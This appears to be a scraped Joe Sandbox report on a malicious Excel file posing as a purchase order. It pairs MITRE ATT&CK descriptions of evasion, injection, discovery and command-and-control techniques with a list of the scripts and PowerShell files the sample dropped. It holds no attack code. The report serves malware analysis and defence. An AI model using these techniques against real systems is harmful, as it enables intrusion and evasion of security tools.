Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xF3wienia PO2102559-1.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Spreading

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\word.vbs

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\prnportjjm[1].vbs

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\yk0CXsC5[1].txt

C:\Users\user\AppData\Local\Temp\2env224q.jgi.ps1

C:\Users\user\AppData\Local\Temp\F0B5.tmp

C:\Users\user\AppData\Local\Temp\brjdi3nn.p5i.ps1

C:\Users\user\AppData\Local\Temp\eadvw4jj.1zw.psm1

C:\Users\user\AppData\Local\Temp\jt425jzm.yv4.ps1

C:\Users\user\AppData\Local\Temp\k1albv2k.agm.psm1

C:\Users\user\AppData\Local\Temp\k4b1llsj.uv2.psm1

Windows Analysis Report
xF3wienia PO2102559-1.xlsx

Function 0356043D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
filenetworkCOMMON

Function 03560487 Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Function 0356049E Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Function 035603BC Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre